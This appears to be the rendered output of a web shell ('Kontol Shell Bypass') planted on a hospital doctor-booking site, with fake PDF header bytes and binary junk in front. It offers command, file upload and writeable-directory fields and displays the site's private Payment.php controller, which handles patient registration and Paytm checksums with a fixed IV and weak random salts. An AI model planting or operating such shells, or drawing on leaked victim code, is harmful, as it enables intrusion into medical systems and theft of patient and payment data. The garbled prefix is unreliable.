%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :
ikan Uploader :
Directory :  /var/www/html/shardahospital.org/drbooking/application/controllers/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/drbooking/application/controllers/Payment.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
Class Payment extends CI_Controller {
	function __construct(){
		parent::__construct();
		$this->load->model(array('Home_Model','Common_Model'));
		$userData = $this->session->userdata('user_data');
		if($userData->id==''){
			redirect('');
		}
	}
	
	/*
	* Function : index
	*
	*/
	public function index()
	{
		$data = array();
		$header = array();
		//$userData = $this->session->userdata('user_data');
		$record_num = end($this->uri->segments);
		$tbl_name = "tbl_booking_confirmation";
		$slugArray = json_decode(base64_decode($record_num));
	
		$userData = $this->session->userdata('user_data');
		$orderId = str_replace('\n','',trim($slugArray->project_id));
	    $recordsDetails = $this->Common_Model->getSingleRecord($tbl_name, '*', array('status'=>'1', 'id'=>$orderId)); 
		$data['doctorDetails'] = $doctorDetails = $this->Common_Model->getSingleRecord('tbl_doctor_master','*',array('status'=>'1', 'dr_id'=>$recordsDetails->dr_id));
		
		if($recordsDetails->his_id=='') {
			$responseArray = $this->setPatientDetails($recordsDetails);
			// stdClass Object ( [RegistrationNo] => 15 [assigningAuthority] => 3 [typeCode] => MR [status] => stdClass Object ( [code] => 9 [message] => Patient is already registered! ) ) 
			$his_id = $responseArray->RegistrationNo;
			// Update HIS ID
			if($his_id>0) {
				$this->Common_Model->updateinfo($tbl_name,array('his_id'=>$his_id,'amount'=>$doctorDetails->doctorfee),'id', $recordsDetails->id);
			}
			
		}
		// Get booking details
		 $data['recordsDetails'] = $this->Common_Model->getSingleRecord($tbl_name, '*', array('status'=>'1', 'id'=>$orderId)); 
		
		$data['userInfo'] = $userData;
		$this->load->view('_parts/header',$header);
		$this->load->view('confirmation',$data);
		$this->load->view('_parts/footer');
	}
	
	/*
	* Function : setPatientDetails
	*
	*/
	public function setPatientDetails($data)
	{
		$dob = str_replace(array('-','/'),'-',$data->dob);
		
		// Get User Gender
		$genger = '';
		$genderArray = $this->Common_Model->getSingleRecord('tbl_title_master', '*', array('status'=>'1', 'id'=>$data->title_id)); 
		$genger = $genderArray->gender_code;
		$post = ["FacilityCode"=> FACILITY_ID,"SourcePatientId"=>"","TitleId"=>$data->title_id,"firstName"=> $data->full_name,"middleName"=> '',"lastName"=> '',"dob"=>"$dob","gender"=>$genger,"Address1"=>$data->address,"Address2"=>'',"cityCode"=>$data->city_id,"stateCode"=>$data->state_id,"countryCode"=>$data->country_id, "mobilePhone"=>$data->mobile_number,"PinCode"=>'',"MaritalStatus"=>'',"appointmentId"=>$data->order_id,"NationalityId"=>$data->country_id,"LeadSourceId"=>"","RegistrationSource"=>"0","NationalityId"=>"0","NationalityId"=>"0","PAddress1"=>$data->address,"PAddress2"=>'',"PcityCode"=>$data->city_id,"PstateCode"=>$data->state_id,"PcountryCode"=>$data->country_id,"PPinCode"=>'',"EmailId"=>$data->login_email];
		//print_r($post); die;
		
		$response = postExistingRequest('CreatePatient',json_encode($post));
		//print_r($response); die;
		return json_decode($response);
	}
	
	/*
	* Function : generate_random
	*/

	function generate_random(){
		return rand(111111, 999999);
		//return '232524';

	}
	
	/*
	* Function : payonline
	*/
	public function payonline()
	{
		$post = $_POST;
		$userData = $this->session->userdata('user_data');
		$booking_id = $post['order_id'];
		$tbl_name = "tbl_booking_confirmation";
			
		// Get User Details
		$userData = $this->Common_Model->getSingleRecord($tbl_name, '*', array('status'=>'1', 'order_id'=>$booking_id)); 
		$customer_id = substr(time(),0,4).''.$this->generate_random();
	  
		$post['billing_name'] = $userData->full_name;
		$post['billing_address'] = $userData->address;
		$post['billing_city'] = '';
		$post['billing_state']= '';
		$post['billing_zip']= '';
		if($post['amount']){
		$post['amount']= $userData->amount;
		}
		$post['billing_country']= 'India';
		$post['tid']= time();
		$post['billing_tel']= $userData->mobile_number;
		$post['billing_email']= $userData->login_email;
		$post['merchant_param4'] = $post['merchant_param4'].' - '.$post['merchant_param2'];
		$post['merchant_param2'] = $userData->mobile_number;
		$post['merchant_param3'] = $userData->login_email;
		$post['merchant_param5'] = $userData->order_id;
		
		
		$success = $this->Home_Model->updateinfo('tbl_booking_confirmation',array('customer_id'=>$customer_id,'status'=>'1','modifiedon'=>date('Y-m-d H:i:s')),'order_id',$userData->order_id);
		
		if($success){
			$data['post'] = $post;
			$TXN_AMOUNT = $userData->amount;
			// Hold Dr Slots
			$this->holdDrslots($post);
			$this->goToPayTm($userData->order_id,$customer_id,$TXN_AMOUNT);
			die;
		} else{
				echo '<script>alert("Unable to submit your request. Kindly try again later.");</script>';
		}
		exit();
		
	}
	
	/*
	* Function : holdDrslots
	*
	*/
	public function holdDrslots($params)
	{
		$booking_id = $params['order_id'];
		$trnsData = $this->Common_Model->getSingleRecord('tbl_slot_transaction_master', '*', array('status'=>'1', 'order_id'=>$booking_id)); 
		$bookingData = $this->Common_Model->getSingleRecord('tbl_booking_confirmation', '*', array('status'=>'1', 'order_id'=>$booking_id)); 
		//print_r($bookingData);
		$data = array();
		$data = array('slots'=>$bookingData->slot_id,
			'order_id'=>$bookingData->order_id,
			'user_id'=>$bookingData->customer_id,
			'dr_id'=>$bookingData->dr_id,
			'status'=>'2'
		);
		
		if(empty($trnsData)) {
			$data['createdon'] = date('y-m-d H:i:s');
			$response = $this->Home_Model->saveinfo($tbl_name='tbl_slot_transaction_master',$data);
		} else {
			$data['modifiedon'] = date('y-m-d H:i:s');
			$response = $this->Home_Model->saveinfo($tbl_name='tbl_slot_transaction_master',$data,'order_id', $booking_id);
		}
		
		return true;
	}
	/*
	* Function : Paytm Payment
	*
	*/
	public function goToPayTm($ORDER_ID, $CUST_ID, $TXN_AMOUNT)
    {
		header("Pragma: no-cache");
		header("Cache-Control: no-cache");
		header("Expires: 0");
		// following files need to be included
		$checkSum = "";
		$paramList = array();
		//$TXN_AMOUNT = '1.0';
		// Create an array having all required parameters for creating checksum.
		$paramList["MID"] = PAYTM_MERCHANT_MID;
		$paramList["ORDER_ID"] = $ORDER_ID;
		$paramList["CUST_ID"] = $CUST_ID;
		$paramList["INDUSTRY_TYPE_ID"] = PAYTM_INDUSTRY;
		$paramList["CHANNEL_ID"] = PAYTM_CHANNEL_ID;
		$paramList["TXN_AMOUNT"] = number_format((float)$TXN_AMOUNT, 2, '.', '');
		$paramList["WEBSITE"] = PAYTM_MERCHANT_WEBSITE;
		$paramList["CALLBACK_URL"] =  base_url()."booking/paymentconfirmation";
	
		//Here checksum string will return by getChecksumFromArray() function.
		$checkSum = $this->getChecksumFromArray($paramList,PAYTM_MERCHANT_KEY);
		echo "<html>
				<head>
				<title>Merchant Check Out Page</title>
				</head>
				<body>
				<center><h1>Please do not refresh this page...</h1></center>
				<form method='post' action='".PAYTM_TXN_URL."' name='f1'>
				<table border='1'>
				<tbody>";

				foreach($paramList as $name => $value) {
				echo '<input type="hidden" name="' . $name .'" value="' . $value .         '">';
				}

				echo "<input type='hidden' name='CHECKSUMHASH' value='". $checkSum . "'>
				</tbody>
				</table>
				<script type='text/javascript'>
				document.f1.submit();
				</script>
				</body>
			</html>";
		exit();
		//return $checkSum;
	}
	
	/* Checksum Functions Starts*/
	private function getChecksumFromArray($arrayList, $key, $sort=1) 
	{
		if ($sort != 0) {
			ksort($arrayList);
		}
		$str = $this->getArray2Str($arrayList);
		$salt = $this->generateSalt_e(4);
		$finalString = $str . "|" . $salt;
		$hash = hash("sha256", $finalString);
		$hashString = $hash . $salt;
		$checksum = $this->encrypt_e($hashString, $key);
		return $checksum;
	}

	function getArray2Str($arrayList) 
	{
		$findme   = 'REFUND';
		$findmepipe = '|';
		$paramStr = "";
		$flag = 1;	
		foreach ($arrayList as $key => $value) {
			$pos = strpos($value, $findme);
			$pospipe = strpos($value, $findmepipe);
			if ($pos !== false || $pospipe !== false) 
			{
				continue;
			}
			
			if ($flag) {
				$paramStr .= $this->checkString_e($value);
				$flag = 0;
			} else {
				$paramStr .= "|" . $this->checkString_e($value);
			}
		}
		return $paramStr;
	}
	
	function checkString_e($value) 
	{
		if ($value == 'null')
			$value = '';
		return $value;
	}
	
	function generateSalt_e($length) 
	{
		$random = "";
		srand((double) microtime() * 1000000);

		$data = "AbcDE123IJKLMN67QRSTUVWXYZ";
		$data .= "aBCdefghijklmn123opq45rs67tuv89wxyz";
		$data .= "0FGH45OP89";

		for ($i = 0; $i < $length; $i++) {
			$random .= substr($data, (rand() % (strlen($data))), 1);
		}

		return $random;
	}
	
	function encrypt_e($input, $ky) 
	{
		$key   = html_entity_decode($ky);
		$iv = "@@@@&&&&####$$$$";
		$data = openssl_encrypt ( $input , "AES-128-CBC" , $key, 0, $iv );
		return $data;
	}
}

Kontol Shell Bypass